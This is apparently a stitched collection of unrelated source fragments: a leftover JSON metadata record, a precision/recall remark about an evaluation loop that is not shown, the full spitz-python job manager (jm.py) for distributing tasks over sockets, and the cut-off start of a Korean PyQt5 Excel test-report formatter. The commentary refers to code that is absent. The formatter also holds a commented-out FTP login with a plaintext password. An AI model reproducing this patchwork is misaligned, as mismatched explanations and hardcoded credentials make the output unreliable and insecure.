"line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "attribute"}]}
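Every branch of the evaluation loop above repeats the same two formulas per variant class: precision = TP / (TP + FP) over the calls that were emitted, and recall = TP / (size of the truth set). A tiny standalone illustration of that arithmetic, with made-up counts (not from any real run):

def prec_rec(tp, fp, total_true):
    # Precision over emitted calls, recall over the truth set; the loop
    # above guards both denominators against zero in the same way.
    precision = float(tp) / float(tp + fp) if tp + fp else None
    recall = float(tp) / float(total_true) if total_true else None
    return precision, recall

print(prec_rec(90, 10, 120))  # (0.9, 0.75) for these illustrative counts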
# =========================== spitz-python/jm.py ==============================

#!/usr/bin/env python

# The MIT License (MIT)
#
# Copyright (c) 2015 Caian Benedicto
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.

from libspitz import JobBinary, SimpleEndpoint
from libspitz import messaging, config
from libspitz import memstat
from libspitz import make_uid
from libspitz import log_lines

from libspitz import PerfModule

import Args
import sys, threading, os, time, logging, struct, traceback

# Global configuration parameters
jm_killtms = None            # Kill task managers after execution
jm_log_file = None           # Output file for logging
jm_verbosity = None          # Verbosity level for logging
jm_heart_timeout = None      # Timeout for heartbeat response
jm_conn_timeout = None       # Socket connect timeout
jm_recv_timeout = None       # Socket receive timeout
jm_send_timeout = None       # Socket send timeout
jm_send_backoff = None       # Job Manager delay between sending tasks
jm_recv_backoff = None       # Job Manager delay between receiving results
jm_memstat = None            # 1 to display memory statistics
jm_profiling = None          # 1 to enable profiling
jm_perf_rinterv = None       # Profiling report interval (seconds)
jm_perf_subsamp = None       # Number of samples collected between report intervals
jm_heartbeat_interval = None
jm_jobid = None

###############################################################################
# Parse global configuration
###############################################################################
def parse_global_config(argdict):
    global jm_killtms, jm_log_file, jm_verbosity, jm_heart_timeout, \
        jm_conn_timeout, jm_recv_timeout, jm_send_timeout, jm_send_backoff, \
        jm_recv_backoff, jm_memstat, jm_profiling, jm_perf_rinterv, \
        jm_perf_subsamp, jm_heartbeat_interval, jm_jobid

    def as_int(v):
        if v == None:
            return None
        return int(v)

    def as_float(v):
        if v == None:
            return None
        return float(v)

    def as_bool(v):
        if v == None:
            return None
        return bool(v)

    jm_killtms = as_bool(argdict.get('killtms', True))
    jm_log_file = argdict.get('log', None)
    jm_verbosity = as_int(argdict.get('verbose', logging.INFO // 10)) * 10
    jm_heart_timeout = as_float(argdict.get('htimeout', config.heart_timeout))
    jm_conn_timeout = as_float(argdict.get('ctimeout', config.conn_timeout))
    jm_recv_timeout = as_float(argdict.get('rtimeout', config.recv_timeout))
    jm_send_timeout = as_float(argdict.get('stimeout', config.send_timeout))
    jm_recv_backoff = as_float(argdict.get('rbackoff', config.recv_backoff))
    jm_send_backoff = as_float(argdict.get('sbackoff', config.send_backoff))
    jm_memstat = as_int(argdict.get('memstat', 0))
    jm_profiling = as_int(argdict.get('profiling', 0))
    jm_perf_rinterv = as_int(argdict.get('rinterv', 60))
    jm_perf_subsamp = as_int(argdict.get('subsamp', 12))
    jm_heartbeat_interval = as_float(argdict.get('heartbeat-interval', 10))
    jm_jobid = argdict.get('jobid', '')

###############################################################################
# Configure the log output format
###############################################################################
def setup_log():
    root = logging.getLogger()
    root.setLevel(jm_verbosity)
    root.handlers = []
    if jm_log_file == None:
        ch = logging.StreamHandler(sys.stderr)
    else:
        ch = logging.StreamHandler(open(jm_log_file, 'wt'))
    ch.setLevel(logging.DEBUG)
    formatter = logging.Formatter('%(asctime)s - %(threadName)s - ' +
        '%(levelname)s - %(message)s')
    ch.setFormatter(formatter)
    root.addHandler(ch)

###############################################################################
# Abort the application with a message
###############################################################################
def abort(error):
    logging.critical(error)
    exit(1)

###############################################################################
# Parse the definition of a proxy
###############################################################################
def parse_proxy(cmd):
    cmd = cmd.split()

    if len(cmd) != 3:
        raise Exception()

    logging.debug('Proxy %s.' % (cmd[1]))

    name = cmd[1]
    gate = cmd[2].split(':')
    prot = gate[0]
    addr = gate[1]
    port = int(gate[2])

    return (name, { 'protocol' : prot, 'address' : addr, 'port' : port })

###############################################################################
# Parse the definition of a compute node
###############################################################################
def parse_node(cmd, proxies):
    cmd = cmd.split()

    if len(cmd) < 2:
        raise Exception()

    logging.debug('Node %s.' % (cmd[1]))

    name = cmd[1]
    host = name.split(':')
    addr = host[0]
    port = int(host[1])

    # Simple endpoint
    if len(cmd) == 2:
        return (name, SimpleEndpoint(addr, port))

    # Endpoint behind a proxy
    elif len(cmd) == 4:
        if cmd[2] != 'through':
            raise Exception()

        proxy = proxies.get(cmd[3], None)
        if proxy == None:
            raise Exception()

        # Proxies are not supported yet...
        logging.info('Node %s is behind a proxy and will be ignored.' %
            (cmd[1]))
        return None

    # Unknown command format
    raise Exception()
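
# The two parsers above imply this nodes-file line format (addresses and
# ports here are illustrative, not taken from the project):
#
#   proxy myproxy tcp:10.0.0.1:8080
#   node 10.0.0.2:7726
#   node 10.0.0.3:7726 through myproxy
#
# A plain 'node' line becomes a SimpleEndpoint(addr, port); 'through' entries
# are parsed but ignored, since proxies are not supported yet.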
###############################################################################
# Load the list of task managers from a file
###############################################################################
def load_tm_list_from_file(filename = None):
    # Override the filename if it is empty
    if filename == None:
        nodefile = 'nodes.txt'
        filename = os.path.join('.', nodefile)

    logging.debug('Loading task manager list from %s...' % (filename,))

    # Read all lines
    try:
        with open(filename, 'rt') as file:
            lines = file.readlines()
    except:
        logging.warning('Error loading the list of task managers from file!')
        return {}

    lproxies = [parse_proxy(x.strip()) for x in lines if x[0:5] == 'proxy']
    proxies = {}

    for p in lproxies:
        if p != None:
            proxies[p[0]] = p[1]

    ltms = [parse_node(x.strip(), proxies) for x in lines if x[0:4] == 'node']
    tms = {}
    for t in ltms:
        if t != None:
            tms[t[0]] = t[1]

    return tms

###############################################################################
# Load the list of task managers from a directory
###############################################################################
def load_tm_list_from_dir(dirname = None):
    # Override the dirname if it is empty
    if dirname == None:
        dirname = 'nodes'

    logging.debug('Loading task manager list from %s...' % (dirname,))

    tms = {}

    # Read all files
    try:
        for f in os.listdir(dirname):
            f = os.path.join(dirname, f)
            if not os.path.isfile(f):
                continue
            tms.update(load_tm_list_from_file(f))
    except:
        logging.warning('Error loading the list of task ' +
            'managers from directory!')
        return {}

    return tms

###############################################################################
# Load the list of task managers from both file and directory sources
###############################################################################
def load_tm_list():
    tms = load_tm_list_from_file()
    tms.update(load_tm_list_from_dir())
    logging.debug('Loaded %d task managers.' % (len(tms),))
    return tms

###############################################################################
# Exchange messages with an endpoint to begin pushing tasks
###############################################################################
def setup_endpoint_for_pushing(e):
    try:
        # Try to connect to a task manager
        e.Open(jm_conn_timeout)
    except:
        # Problem connecting to the task manager
        # Because this is a connection event,
        # make it a debug rather than a warning
        logging.debug('Error connecting to task manager at %s:%d!',
            e.address, e.port)
        log_lines(traceback.format_exc(), logging.debug)
        e.Close()
        return False
    try:
        # Send the job identifier
        e.WriteString(jm_jobid)

        # Ask if it is possible to send tasks
        e.WriteInt64(messaging.msg_send_task)

        # Verify job id of the answer
        jobid = e.ReadString(jm_recv_timeout)

        if jm_jobid != jobid:
            logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',
                e.address, e.port, jm_jobid, jobid)
            e.Close()
            return False

        # Wait for a response
        response = e.ReadInt64(jm_recv_timeout)

        if response == messaging.msg_send_full:
            # Task manager is full
            logging.debug('Task manager at %s:%d is full.',
                e.address, e.port)

        elif response == messaging.msg_send_more:
            # Continue to the task pushing loop
            return True

        else:
            # The task manager is not replying as expected
            logging.error('Unknown response from the task manager!')

    except:
        # Problem connecting to the task manager
        logging.warning('Error connecting to task manager at %s:%d!',
            e.address, e.port)
        log_lines(traceback.format_exc(), logging.debug)

    e.Close()
    return False

###############################################################################
# Exchange messages with an endpoint to begin reading results
###############################################################################
def setup_endpoint_for_pulling(e):
    try:
        # Try to connect to a task manager
        e.Open(jm_conn_timeout)
    except:
        # Problem connecting to the task manager
        # Because this is a connection event,
        # make it a debug rather than a warning
        logging.debug('Error connecting to task manager at %s:%d!',
            e.address, e.port)
        log_lines(traceback.format_exc(), logging.debug)
        e.Close()
        return False
    try:
        # Send the job identifier
        e.WriteString(jm_jobid)

        # Ask if it is possible to read results
        e.WriteInt64(messaging.msg_read_result)

        # Verify job id of the answer
        jobid = e.ReadString(jm_recv_timeout)

        if jm_jobid != jobid:
            logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',
                e.address, e.port, jm_jobid, jobid)
            e.Close()
            return False

        return True

    except:
        # Problem connecting to the task manager
        logging.warning('Error connecting to task manager at %s:%d!',
            e.address, e.port)
        log_lines(traceback.format_exc(), logging.debug)

    e.Close()
    return False
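
# Both setup routines above speak the same handshake, differing only in the
# requested operation (a summary of the calls they make):
#
#   -> WriteString(jm_jobid)       identify the job
#   -> WriteInt64(op)              msg_send_task, or msg_read_result to pull
#   <- ReadString()                peer echoes its job id; must match
#   <- ReadInt64()                 push only: msg_send_more / msg_send_full
#
# Any mismatch or unexpected reply closes the endpoint and returns False.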
###############################################################################
# Push tasks while the task manager is not full
###############################################################################
def push_tasks(job, runid, jm, tm, taskid, task, tasklist, completed):
    # Keep pushing until finished or the task manager is full
    sent = []
    while True:
        if task == None:

            # Avoid calling next_task after it's finished
            if completed:
                logging.debug('There are no new tasks to generate.')
                return (True, 0, None, sent)

            # Only get a task if the last one was already sent
            newtaskid = taskid + 1
            r1, newtask, ctx = job.spits_job_manager_next_task(jm, newtaskid)

            # Exit if done
            if r1 == 0:
                return (True, 0, None, sent)

            if newtask == None:
                logging.error('Task %d was not pushed!', newtaskid)
                return (False, taskid, task, sent)

            if ctx != newtaskid:
                logging.error('Context verification failed for task %d!',
                    newtaskid)
                return (False, taskid, task, sent)

            # Add the generated task to the tasklist
            taskid = newtaskid
            task = newtask[0]
            tasklist[taskid] = (0, task)

            logging.debug('Generated task %d with payload size of %d bytes.',
                taskid, len(task) if task != None else 0)

        try:
            logging.debug('Pushing %d...', taskid)

            # Push the task to the active task manager
            tm.WriteInt64(taskid)
            tm.WriteInt64(runid)
            if task == None:
                tm.WriteInt64(0)
            else:
                tm.WriteInt64(len(task))
                tm.Write(task)

            # Wait for a response
            response = tm.ReadInt64(jm_recv_timeout)

            if response == messaging.msg_send_full:
                # Task was sent, but the task manager is now full
                sent.append((taskid, task))
                task = None
                break

            elif response == messaging.msg_send_more:
                # Continue pushing tasks
                sent.append((taskid, task))
                task = None

            elif response == messaging.msg_send_rjct:
                # Task was rejected by the task manager; this is not
                # predicted for a model where just one task manager
                # pushes tasks, so exit the task loop
                logging.warning('Task manager at %s:%d rejected task %d',
                    tm.address, tm.port, taskid)
                break

            else:
                # The task manager is not replying as expected
                logging.error('Unknown response from the task manager!')
                break
        except:
            # Something went wrong with the connection,
            # try with another task manager
            logging.error('Error pushing tasks to task manager!')
            log_lines(traceback.format_exc(), logging.debug)
            break

    return (False, taskid, task, sent)

###############################################################################
# Read and commit tasks while the task manager is not empty
###############################################################################
def commit_tasks(job, runid, co, tm, tasklist, completed):
    # Keep pulling until the task manager is empty
    n_errors = 0
    while True:
        try:
            # Pull the task from the active task manager
            taskid = tm.ReadInt64(jm_recv_timeout)

            if taskid == messaging.msg_read_empty:
                # No more tasks to receive
                return

            # Read the run id
            taskrunid = tm.ReadInt64(jm_recv_timeout)

            # Read the rest of the task
            r = tm.ReadInt64(jm_recv_timeout)
            ressz = tm.ReadInt64(jm_recv_timeout)
            res = tm.Read(ressz, jm_recv_timeout)

            # Tell the task manager that the task was received
            tm.WriteInt64(messaging.msg_read_result)

            # Warning: exceptions after this line may cause task loss
            # if not handled properly!!

            if r != 0:
                n_errors += 1
                if r == messaging.res_module_error:
                    logging.error('The remote worker crashed while ' +
                        'executing task %d!', taskid)
                else:
                    logging.error('The task %d was not successfully executed, ' +
                        'worker returned %d!', taskid, r)

            if taskrunid < runid:
                logging.debug('The task %d is from the previous run %d ' +
                    'and will be ignored!', taskid, taskrunid)
                continue

            if taskrunid > runid:
                logging.error('Received task %d from a future run %d!',
                    taskid, taskrunid)
                continue

            # Validate the completed task

            c = completed.get(taskid, (None, None))
            if c[0] != None:
                # This may happen with the fault tolerance system. This may
                # lead to tasks being put in the tasklist by the job manager
                # while being committed. The tasklist must be constantly
                # sanitized.
                logging.warning('The task %d was received more than once ' +
                    'and will not be committed again!',
                    taskid)
                # Remove the completed task from the tasklist
                tasklist.pop(taskid, (None, None))
                continue

            # Remove it from the tasklist

            p = tasklist.pop(taskid, (None, None))
            if p[0] == None and c[0] == None:
                # The task was not already completed and was not scheduled
                # to be executed; this is a serious problem!
                logging.error('The task %d was not in the working list!',
                    taskid)

            r2 = job.spits_committer_commit_pit(co, res)

            if r2 != 0:
                logging.error('The task %d was not successfully committed, ' +
                    'committer returned %d', taskid, r2)

            # Add the completed task to the list
            completed[taskid] = (r, r2)

        except:
            # Something went wrong with the connection,
            # try with another task manager
            break
    if n_errors > 0:
        logging.warning('There were %d failed tasks' % (n_errors,))
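
# Layout of a result frame as read by commit_tasks above (all integers are
# 64-bit, sizes in bytes):
#
#   taskid     int64    msg_read_empty terminates the stream
#   taskrunid  int64    run the task belongs to
#   r          int64    worker return code, 0 on success
#   ressz      int64    length of the result payload
#   res        bytes    ressz bytes passed to spits_committer_commit_pit
#
# msg_read_result is written back as an acknowledgement before committing.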
def infinite_tmlist_generator():
    ''' Iterates over the TMs returned by the load_tm_list() method
    indefinitely. The result of a single iteration is a tuple containing
    (Finished, Name, TM), where Finished == True indicates that the currently
    listed TMs finished. The next iteration will read the TMs again, setting
    Finished to False.

    Conditions:
        Finished == True <=> (Name, TM) == (None, None)
        Finished == False <=> (Name, TM) != (None, None)

    Example:
        for isEnd, name, tm in infinite_tmlist_generator():
            if not isEnd:
                do something with the task manager (name, tm)
            else:
                all tms were processed, you can do post processing here. The
                next iteration will set isEnd to False and start over again'''
    tmlist = load_tm_list()
    while True:
        try:
            newtmlist = load_tm_list()
            if len(newtmlist) > 0:
                tmlist = newtmlist
            elif len(tmlist) > 0:
                logging.warning('New list of task managers is ' +
                    'empty and will not be updated!')
        except:
            if len(tmlist) > 0:
                logging.warning('New list of task managers is ' +
                    'empty and will not be updated!')
        for name, tm in tmlist.items():
            yield False, name, tm
        yield True, None, None


###############################################################################
# Heartbeat routine
###############################################################################
def heartbeat(finished):
    global jm_heartbeat_interval
    # Monotonic wall clock for pacing the heartbeats
    t_last = time.monotonic()
    for isEnd, name, tm in infinite_tmlist_generator():
        if finished[0]:
            logging.debug('Stopping heartbeat thread...')
            return
        if isEnd:
            t_curr = time.monotonic()
            elapsed = t_curr - t_last
            t_last = t_curr
            sleep_for = max(jm_heartbeat_interval - elapsed, 0)
            time.sleep(sleep_for)
        else:
            try:
                tm.Open(jm_heart_timeout)
            except:
                # Problem connecting to the task manager
                # Because this is a connection event,
                # make it a debug rather than a warning
                logging.debug('Error connecting to task manager at %s:%d!',
                    tm.address, tm.port)
                log_lines(traceback.format_exc(), logging.debug)
                tm.Close()
                continue
            try:
                # Send the job identifier
                tm.WriteString(jm_jobid)

                # Verify job id of the answer
                jobid = tm.ReadString(jm_recv_timeout)

                if jm_jobid != jobid:
                    logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',
                        tm.address, tm.port, jm_jobid, jobid)
                    tm.Close()
                    continue

                # Send the heartbeat
                tm.WriteInt64(messaging.msg_send_heart)
            except:
                logging.warning('Error connecting to task manager at %s:%d!',
                    tm.address, tm.port)
                log_lines(traceback.format_exc(), logging.debug)
            finally:
                tm.Close()


###############################################################################
# Job Manager routine
###############################################################################
def jobmanager(argv, job, runid, jm, tasklist, completed):
    logging.info('Job manager running...')
    memstat.stats()

    # Load the list of nodes to connect to
    tmlist = load_tm_list()

    # Store some metadata: (taskid, task) pairs awaiting commit
    submissions = []

    # Task generation loop

    taskid = 0
    task = None
    finished = False

    while True:
        # Reload the list of task managers at each
        # run so new tms can be added on the fly
        try:
            newtmlist = load_tm_list()
            if len(newtmlist) > 0:
                tmlist = newtmlist
            elif len(tmlist) > 0:
                logging.warning('New list of task managers is ' +
                    'empty and will not be updated!')
        except:
            logging.error('Failed parsing task manager list!')

        for name, tm in tmlist.items():
            logging.debug('Connecting to %s:%d...', tm.address, tm.port)

            # Open the connection to the task manager and query if it is
            # possible to send data
            if not setup_endpoint_for_pushing(tm):
                finished = False
            else:
                logging.debug('Pushing tasks to %s:%d...', tm.address, tm.port)

                # Task pushing loop
                memstat.stats()
                finished, taskid, task, sent = push_tasks(job, runid, jm,
                    tm, taskid, task, tasklist, completed[0] == 1)

                # Add the sent tasks to the submission list
                submissions = submissions + sent

                # Close the connection with the task manager
                tm.Close()

                logging.debug('Finished pushing tasks to %s:%d.',
                    tm.address, tm.port)

        if finished and completed[0] == 0:
            # Tell everyone the task generation was completed
            logging.info('All tasks generated.')
            completed[0] = 1

        # Exit the job manager when done
        if len(tasklist) == 0 and completed[0] == 1:
            logging.debug('Job manager exiting...')
            return

        # Keep sending the uncommitted tasks
        # TODO: WARNING this will flood the system
        # with repeated tasks
        if finished and len(tasklist) > 0:
            if len(submissions) == 0:
                logging.critical('The submission list is empty but '
                    'the task list is not! Some tasks were lost!')

            # Select the oldest task that is not already completed
            while True:
                taskid, task = submissions.pop(0)
                if taskid in tasklist:
                    break

            # Remove the committed tasks from the submission list
            submissions = [x for x in submissions if x[0] in tasklist]

        time.sleep(jm_send_backoff)

###############################################################################
# Committer routine
###############################################################################
def committer(argv, job, runid, co, tasklist, completed):
    logging.info('Committer running...')
    memstat.stats()

    # Load the list of nodes to connect to
    tmlist = load_tm_list()

    # Result pulling loop
    while True:
        # Reload the list of task managers at each
        # run so new tms can be added on the fly
        try:
            newtmlist = load_tm_list()
            if len(newtmlist) > 0:
                tmlist = newtmlist
            elif len(tmlist) > 0:
                logging.warning('New list of task managers is ' +
                    'empty and will not be updated!')
        except:
            logging.error('Failed parsing task manager list!')

        for name, tm in tmlist.items():
            logging.debug('Connecting to %s:%d...', tm.address, tm.port)

            # Open the connection to the task manager and query if it is
            # possible to read data
            if not setup_endpoint_for_pulling(tm):
                continue

            logging.debug('Pulling tasks from %s:%d...', tm.address, tm.port)

            # Task pulling loop
            commit_tasks(job, runid, co, tm, tasklist, completed)
            memstat.stats()

            # Close the connection with the task manager
            tm.Close()

            logging.debug('Finished pulling tasks from %s:%d.',
                tm.address, tm.port)

        if len(tasklist) == 0 and completed[0] == 1:
            logging.info('All tasks committed.')
            logging.debug('Committer exiting...')
            return

        # Refresh the tasklist
        for taskid in completed:
            tasklist.pop(taskid, 0)

        time.sleep(jm_recv_backoff)

###############################################################################
# Kill all task managers
###############################################################################
def killtms():
    logging.info('Killing task managers...')

    # Load the list of nodes to connect to
    tmlist = load_tm_list()

    for name, tm in tmlist.items():
        try:
            logging.debug('Connecting to %s:%d...', tm.address, tm.port)

            tm.Open(jm_conn_timeout)

            # Send the job identifier
            tm.WriteString(jm_jobid)

            # Read back the job id of the answer
            tm.ReadString(jm_recv_timeout)

            tm.WriteInt64(messaging.msg_terminate)
            tm.Close()
        except:
            # Problem connecting to the task manager
            logging.warning('Error connecting to task manager at %s:%d!',
                tm.address, tm.port)
            log_lines(traceback.format_exc(), logging.debug)
###############################################################################
# Run routine
###############################################################################
def run(argv, jobinfo, job, runid):
    # List of pending tasks
    memstat.stats()
    tasklist = {}

    # Keep an extra list of completed tasks; slot 0 doubles as the
    # 'all tasks generated' flag shared between the threads
    completed = {0: 0}

    # Start the job manager
    logging.info('Starting job manager for job %d...', runid)

    # Create the job manager from the job module
    jm = job.spits_job_manager_new(argv, jobinfo)

    jmthread = threading.Thread(target=jobmanager,
        args=(argv, job, runid, jm, tasklist, completed))
    jmthread.start()

    # Start the committer
    logging.info('Starting committer for job %d...', runid)

    # Create the committer from the job module
    co = job.spits_committer_new(argv, jobinfo)

    cothread = threading.Thread(target=committer,
        args=(argv, job, runid, co, tasklist, completed))
    cothread.start()

    # Wait for both threads
    jmthread.join()
    cothread.join()

    # Commit the job
    logging.info('Committing Job...')
    r, res, ctx = job.spits_committer_commit_job(co, 0x12345678)
    logging.debug('Job committed.')

    # Finalize the job manager
    logging.debug('Finalizing Job Manager...')
    job.spits_job_manager_finalize(jm)

    # Finalize the committer
    logging.debug('Finalizing Committer...')
    job.spits_committer_finalize(co)
    memstat.stats()

    if res == None:
        logging.error('Job did not push any result!')
        return messaging.res_module_noans, None

    if ctx != 0x12345678:
        logging.error('Context verification failed for job!')
        return messaging.res_module_ctxer, None

    logging.debug('Job %d finished successfully.', runid)
    return r, res[0]

###############################################################################
# Main routine
###############################################################################
def main(argv):
    # Print usage
    if len(argv) <= 1:
        abort('USAGE: jm module [module args]')

    # Parse the arguments
    args = Args.Args(argv[1:])
    parse_global_config(args.args)

    # Setup logging
    setup_log()
    logging.debug('Hello!')

    # Enable memory debugging
    if jm_memstat == 1:
        memstat.enable()
    memstat.stats()

    # Enable perf module
    if jm_profiling:
        PerfModule(make_uid(), 0, jm_perf_rinterv, jm_perf_subsamp)

    # Load the module
    module = args.margs[0]
    job = JobBinary(module)

    # Remove JM arguments when passing to the module
    margv = args.margs

    # Keep a run identifier
    runid = [0]

    # Wrapper to include job module
    def run_wrapper(argv, jobinfo):
        runid[0] = runid[0] + 1
        return run(argv, jobinfo, job, runid[0])

    # Wrapper for the heartbeat
    finished = [False]
    def heartbeat_wrapper():
        heartbeat(finished)

    # Start the heartbeat
    threading.Thread(target=heartbeat_wrapper).start()

    # Run the module
    logging.info('Running module')
    memstat.stats()
    r = job.spits_main(margv, run_wrapper)
    memstat.stats()

    # Stop the heartbeat thread
    finished[0] = True

    # Kill the workers
    if jm_killtms:
        killtms()

    # Print final memory report
    memstat.stats()

    # Finalize
    logging.debug('Bye!')
    #exit(r)

###############################################################################
# Entry point
###############################################################################
if __name__ == '__main__':
    main(sys.argv)
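
# Example invocation (a sketch; the exact option syntax is defined by the
# Args module, which is not shown here, and 'mymodule' is a placeholder for
# a spits job binary):
#
#   python jm.py mymodule
#
# parse_global_config() reads optional knobs such as log, verbose, killtms,
# jobid and the timeout/backoff values from the parsed argument dictionary.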
# -*- coding: utf-8 -*-
"""
Created on Thr Oct 18 14:25:12 2019
@author: TestEnC hanrim lee

"""
import os
import sys
import re
import openpyxl
# import pkg_resources.py2_warn
from os.path import expanduser
import threading

# from konlpy.tag import Komoran
from time import sleep
from datetime import datetime

# import pytagcloud
from PyQt5.QtCore import QThread, pyqtSignal
# selenium library
from openpyxl.styles import Alignment, Font, NamedStyle, PatternFill
from openpyxl import formatting, styles, Workbook
from openpyxl.styles.borders import Border, Side

class Formater(QThread):

    print_flag = pyqtSignal(str)
    end_flag = pyqtSignal()
    fileCheck_flag = pyqtSignal()
    progress_flag = pyqtSignal()
    count_flag = pyqtSignal()
    dict_result = None
    tot_count = 0

    def __init__(self, filePath, opFlag, modeFlag, parent=None):
        QThread.__init__(self, parent)

        self.file_names = filePath
        self.list_files = self.file_names.split(",")
        self.list_out_files = []
        self.dict_out = {}
        self.dict_readData = {}
        # self.list_sheet_names = []

        self.opFlag = opFlag
        self.modeFlag = modeFlag
        self.home = expanduser("~")

        self.end_count = "n"
        self.totalRows = 0
        self.currentRow = 0
        self.current_path = os.getcwd()
        self.battery_spec = 0.0

        # style fill patterns (RGB hex; e.g. FF0000 red, 0000FF blue)
        self.brown_fill = PatternFill(start_color='DDD9C4', end_color='DDD9C4', fill_type='solid')
        self.light_brown_fill = PatternFill(start_color='EEECE1', end_color='EEECE1', fill_type='solid')
        self.gray_fill = PatternFill(start_color='E7E6E6', end_color='E7E6E6', fill_type='solid')
        self.dark_gray_fill = PatternFill(start_color='D9D9D9', end_color='D9D9D9', fill_type='solid')
        self.light_gray_fill = PatternFill(start_color='F2F2F2', end_color='F2F2F2', fill_type='solid')
        self.apricot_fill = PatternFill(start_color='FDE9D9', end_color='FDE9D9', fill_type='solid')
        self.skyBlue_fill = PatternFill(start_color='DCE6F1', end_color='DCE6F1', fill_type='solid')
        self.yellow_fill = PatternFill(start_color='FFFF00', end_color='FFFF00', fill_type='solid')
        self.orange_fill = PatternFill(start_color='FFC000', end_color='FFC000', fill_type='solid')

        # style font color and size
        self.top_font = Font(name='맑은 고딕', size=12, bold=True, color='2B2B2B')
        self.index_font = Font(name='맑은 고딕', size=11, bold=True, color='2B2B2B')
        self.value_font = Font(name='맑은 고딕', size=11, bold=False, color='2B2B2B')
        self.value2_font = Font(name='맑은 고딕', size=10, bold=True, color='2B2B2B')
        self.f2_value_font = Font(name='맑은 고딕', size=10, bold=False, color='2B2B2B')
        self.f2_blue_font = Font(name='맑은 고딕', size=10, bold=False, color='0000FF')
        self.f2_red_font = Font(name='맑은 고딕', size=10, bold=False, color='FF0000')

        # style alignment
        self.general_alignment = Alignment(wrap_text=True, horizontal="center", vertical="center")
        self.top_alignment = Alignment(wrap_text=False, horizontal="left", vertical="center")
        self.top_alignment_2 = Alignment(wrap_text=True, horizontal="left", vertical="center")
        self.top_alignment_3 = Alignment(wrap_text=True, horizontal="left", vertical="top")

        # style border
        self.thin_border = Border(left=Side(style='thin'), right=Side(style='thin'), top=Side(style='thin'), bottom=Side(style='thin'))

    # FTP-related variables and settings
    # self.hostname = '192.168.0.108'
    # self.port = 21
    # self.username = 'voc'
    # self.password = 'testenc@01'

    # Periodically emit count_flag until processing signals completion
    def getCountRows(self):

        while True:
            if self.end_count == "n":
                sleep(0.5)
                self.count_flag.emit()
            else:
                break

    # Format and emit a log message through print_flag
    def setPrintText(self, text):

        strToday = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
        text = self.find_between(text, "/s", "/e")
        print_text = strToday + ":\n" + text + "\n"
        self.print_flag.emit("{}".format(print_text))

    # Stop the thread
    def stop(self):
        sleep(0.5)
        self.terminate()

    # Strip special characters
    def removeString(self, text):

        tempText = re.sub('[-=+,#/\?^$@*"※~&%ㆍ!』\‘|\(\)\[\]\<\>\{\}`><]\'', '', text)
        return tempText

    # Substring between the first occurrences of two delimiters
    def find_between(self, s, first, last):
        try:
            returnData = ""
            start = s.index(first) + len(first)
            end = s.index(last, start)
            returnData = s[start:end]
            return returnData
        except ValueError:
            return returnData

    # Substring between the last occurrences of two delimiters
    def find_between_r(self, s, first, last):
        try:
            returnData = ""
            start = s.rindex(first) + len(first)
            end = s.rindex(last, start)
            returnData = s[start:end]
            return returnData
        except ValueError:
            return returnData

    # Format a numeric value to two decimal places ('-' when empty)
    def check_num(self, num):

        return_data = None
        if num is None or num == '':
            return_data = '-'
        else:
            try:
                return_data = '%.2f' % float(num)
            except:
                return_data = str(num)

        return return_data

    # Absolute difference between a standard and a measured value
    def cal_comparison(self, standard, measure):

        return_data = None
        try:
            return_data = self.check_num(abs(round(abs(float(measure)) - float(standard), 2)))
        except:
            return_data = '-'

        return return_data

    # Check whether a value can be converted to float
    def isNumber(self, string_data):

        try:
            temp_data = float(string_data)
            return True
        except:
            return False

    # Normalize empty or N/A values to '-'
    def check_empty(self, string_data):

        return_data = None
        if string_data is None or string_data == '' or string_data.lower() in ['n/a', 'na', 'nt', 'n/t']:
            return_data = '-'
        else:
            return_data = str(string_data)

        return return_data
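
    # Example behavior of the helpers above:
    #
    #   check_num('16.8')              -> '16.80'
    #   check_num(None)                -> '-'
    #   cal_comparison(14.00, '-12.5') -> '1.50'   (abs(round(12.5 - 14.0, 2)))
    #   check_empty('N/A')             -> '-'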
    # Summary tab
    def summary_generate_data(self):

        try:
            for idx, item in enumerate(self.list_files):

                temp_data = {}
                wb_input = openpyxl.load_workbook(item, data_only=True)
                wb_output = openpyxl.load_workbook(self.list_out_files[idx])

                # get data from wb_input
                sheet_in = wb_input['Summary']
                temp_data['팻네임 / 모델명'] = sheet_in['C5'].value
                temp_data['OS 및 Binary Version'] = sheet_in['C8'].value + "/" + sheet_in['C6'].value
                temp_data['Chipset (AP / CP)'] = sheet_in['K6'].value
                temp_data['가로 폭 (mm) / Display Size (inch)'] = sheet_in['K7'].value
